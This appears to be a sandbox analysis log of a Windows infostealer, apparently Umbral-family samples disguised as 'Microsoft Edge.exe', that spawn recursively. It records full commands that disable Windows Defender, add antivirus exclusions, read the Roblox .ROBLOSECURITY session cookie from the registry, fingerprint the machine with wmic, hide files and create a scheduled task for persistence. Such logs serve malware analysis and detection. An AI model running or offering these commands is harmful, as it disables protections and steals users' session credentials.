"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
52⤵
- Command and Scripting Interpreter: PowerShell
PID:6628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
52⤵
- Command and Scripting Interpreter: PowerShell
PID:5468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
52⤵
PID:6516

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
52⤵
PID:184

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
52⤵
PID:6388

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
52⤵
PID:3120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
52⤵
- Command and Scripting Interpreter: PowerShell
PID:6428

C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
52⤵
- Detects videocard installed
PID:5336

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
52⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2208

C:\Windows\system32\PING.EXE
ping localhost
53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6812

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
50⤵
PID:6572

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
51⤵
- Checks computer location settings
PID:4252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
52⤵
PID:7064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
53⤵
PID:1092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
54⤵
PID:5400

C:\Windows\system32\cmd.exe
cmd
54⤵
PID:6204

C:\Windows\system32\chcp.com
chcp 65001
53⤵
PID:6248

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
53⤵
- Delays execution with timeout.exe
PID:4376

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
53⤵
PID:2536

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
52⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
52⤵
PID:3968

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
52⤵
PID:436

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
51⤵
PID:6644

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
52⤵
PID:728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
53⤵
PID:1900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
54⤵
PID:1088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
55⤵
PID:5728

C:\Windows\system32\cmd.exe
cmd
55⤵
PID:1536

C:\Windows\system32\chcp.com
chcp 65001
54⤵
PID:3112

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
54⤵
- Delays execution with timeout.exe
PID:1968

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
54⤵
PID:1088

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
53⤵
- Checks processor information in registry
PID:3152

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
53⤵
PID:180

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
53⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
52⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
53⤵
- Checks computer location settings
PID:3192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
54⤵
PID:6832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
55⤵
PID:6888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
56⤵
PID:6996

C:\Windows\system32\cmd.exe
cmd
56⤵
PID:6928

C:\Windows\system32\chcp.com
chcp 65001
55⤵
PID:6472

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
55⤵
- Delays execution with timeout.exe
PID:3484

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
55⤵
PID:7084

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
54⤵
PID:4920

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
54⤵
PID:6452

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
54⤵
PID:6340

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
53⤵
PID:6752

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
54⤵
- Checks computer location settings
PID:6848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
55⤵
PID:6276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
56⤵
PID:4432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
57⤵
PID:5908

C:\Windows\system32\cmd.exe
cmd
57⤵
PID:6768

C:\Windows\system32\chcp.com
chcp 65001
56⤵
PID:6192

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
56⤵
- Delays execution with timeout.exe
PID:6596

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
56⤵
PID:3556

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
55⤵
PID:2844

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
55⤵
PID:6044

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
55⤵
PID:6428

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
54⤵
- Checks computer location settings
PID:6288

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
55⤵
PID:6764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
56⤵
PID:5296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
57⤵
PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
58⤵
PID:7152

C:\Windows\system32\cmd.exe
cmd
58⤵
PID:5716

C:\Windows\system32\chcp.com
chcp 65001
57⤵
PID:5216

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
57⤵
- Delays execution with timeout.exe
PID:4636

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
57⤵
PID:3488

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
56⤵
- Checks processor information in registry
PID:6232

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
56⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
56⤵
PID:1620

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
55⤵
PID:6576

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
56⤵
PID:1644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
57⤵
PID:5172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
58⤵
PID:6372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
59⤵
PID:6416

C:\Windows\system32\cmd.exe
cmd
59⤵
PID:5328

C:\Windows\system32\chcp.com
chcp 65001
58⤵
PID:2356

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
58⤵
- Delays execution with timeout.exe
PID:3036

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
58⤵
PID:6576

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
57⤵
PID:4344

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
57⤵
PID:4064

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
57⤵
PID:3884

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
56⤵
- Checks computer location settings
PID:1340

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
57⤵
PID:6240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
58⤵
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
59⤵
PID:3076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
60⤵
PID:5896

C:\Windows\system32\cmd.exe
cmd
60⤵
PID:6912

C:\Windows\system32\chcp.com
chcp 65001
59⤵
PID:6928

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
59⤵
- Delays execution with timeout.exe
PID:5068

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
59⤵
PID:2536

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
58⤵
- Checks processor information in registry
PID:6292

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
58⤵
PID:6808

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
58⤵
- Drops file in Drivers directory
PID:3792

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
59⤵
PID:6452

C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
59⤵
- Views/modifies file attributes
PID:4808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
59⤵
- Command and Scripting Interpreter: PowerShell
PID:6980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
59⤵
- Command and Scripting Interpreter: PowerShell
PID:5932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
59⤵
- Command and Scripting Interpreter: PowerShell
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
59⤵
PID:6616

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
57⤵
PID:6340

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
58⤵
- Checks computer location settings
PID:6684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
59⤵
PID:1492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
60⤵
PID:6020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
61⤵
PID:2380

C:\Windows\system32\cmd.exe
cmd
61⤵
PID:5420

C:\Windows\system32\chcp.com
chcp 65001
60⤵
PID:4920

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
60⤵
- Delays execution with timeout.exe
PID:5244

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
60⤵
PID:6812

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
59⤵
- Checks processor information in registry
PID:6064

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
59⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
59⤵
PID:4400

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
58⤵
- Checks computer location settings
PID:6084

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
59⤵
- Checks computer location settings
PID:4760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
60⤵
PID:5380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
61⤵
PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
62⤵
PID:4908

C:\Windows\system32\cmd.exe
cmd
62⤵
PID:820

C:\Windows\system32\chcp.com
chcp 65001
61⤵
PID:6160

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
61⤵
- Delays execution with timeout.exe
PID:4956

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
61⤵
PID:3484

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
60⤵
PID:3724

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
60⤵
PID:6116

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
60⤵
PID:6084

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
59⤵
PID:2356

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
60⤵
PID:4420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
61⤵
PID:4892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
62⤵
PID:4588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
63⤵
PID:7016

C:\Windows\system32\cmd.exe
cmd
63⤵
PID:7068

C:\Windows\system32\chcp.com
chcp 65001
62⤵
PID:7040

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
62⤵
- Delays execution with timeout.exe
PID:5320

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
62⤵
PID:6680

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
61⤵
- Checks processor information in registry
PID:5076

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
61⤵
PID:6308

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
61⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
60⤵
- Checks computer location settings
PID:7108

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
61⤵
PID:7036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
62⤵
PID:6236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
63⤵
PID:4804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
64⤵
PID:6044

C:\Windows\system32\cmd.exe
cmd
64⤵
PID:1604

C:\Windows\system32\chcp.com
chcp 65001
63⤵
PID:4496

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
63⤵
- Delays execution with timeout.exe
PID:1980

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
63⤵
PID:5884

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
62⤵
PID:7136

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
62⤵
PID:5532

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
62⤵
PID:1340

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
61⤵
PID:5636

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
62⤵
- Checks computer location settings
PID:6776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
63⤵
PID:6720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
64⤵
PID:1392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
65⤵
PID:5572

C:\Windows\system32\cmd.exe
cmd
65⤵
PID:6584

C:\Windows\system32\chcp.com
chcp 65001
64⤵
PID:4368

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
64⤵
- Delays execution with timeout.exe
PID:6656

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
64⤵
PID:1340

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
63⤵
- Checks processor information in registry
PID:4664

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
63⤵
PID:3652

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
63⤵
PID:2844

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
62⤵
- Checks computer location settings
PID:4064

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
63⤵
- Checks computer location settings
PID:2280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
64⤵
PID:6064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
65⤵
PID:3164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
66⤵
PID:6988

C:\Windows\system32\cmd.exe
cmd
66⤵
PID:6996

C:\Windows\system32\chcp.com
chcp 65001
65⤵
PID:6268

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
65⤵
- Delays execution with timeout.exe
PID:6800

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
65⤵
PID:2504

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
64⤵
PID:5520

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
64⤵
PID:5884

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
64⤵
PID:3044

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
63⤵
PID:6532

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
64⤵
PID:3484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
65⤵
PID:1504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
66⤵
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
67⤵
PID:5732

C:\Windows\system32\cmd.exe
cmd
67⤵
PID:5932

C:\Windows\system32\chcp.com
chcp 65001
66⤵
PID:4368

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
66⤵
- Delays execution with timeout.exe
PID:2356

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
66⤵
PID:3108

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
65⤵
PID:6680

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
65⤵
PID:6764

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
65⤵
PID:4756

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
64⤵
PID:6116

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
65⤵
PID:4020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
66⤵
PID:5212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
67⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
68⤵
PID:4492

C:\Windows\system32\cmd.exe
cmd
68⤵
PID:6248

C:\Windows\system32\chcp.com
chcp 65001
67⤵
PID:364

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
67⤵
- Delays execution with timeout.exe
PID:3608

C:\Windows\system32\mode.com
mode con: cols=103 lines=21
67⤵
PID:3536

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
66⤵
PID:3488

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
66⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
66⤵
PID:2296

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
65⤵
- Checks computer location settings
PID:6592

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
66⤵
- Checks computer location settings
PID:5560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
67⤵
PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
68⤵
PID:7024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
69⤵
PID:6888

C:\Windows\system32\cmd.exe
cmd
69⤵
PID:5252

C:\Windows\system32\chcp.com
chcp 65001
68⤵
PID:216

C:\Windows\system32\timeout.exe
timeout 4 /nobreak
68⤵
- Delays execution with timeout.exe
PID:2224

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
67⤵
PID:5040

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
67⤵
PID:1220

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
67⤵
PID:1392

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
66⤵
- Checks computer location settings
PID:1680

C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
67⤵
PID:6216

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
67⤵
PID:6116

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft Edge'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6016

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\Admin\AppData\Roaming\Microsoft Edge"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:6024

C:\Users\Admin\AppData\Roaming\Microsoft Edge
"C:\Users\Admin\AppData\Roaming\Microsoft Edge"
1⤵
PID:2760

C:\Users\Admin\AppData\Roaming\Microsoft Edge
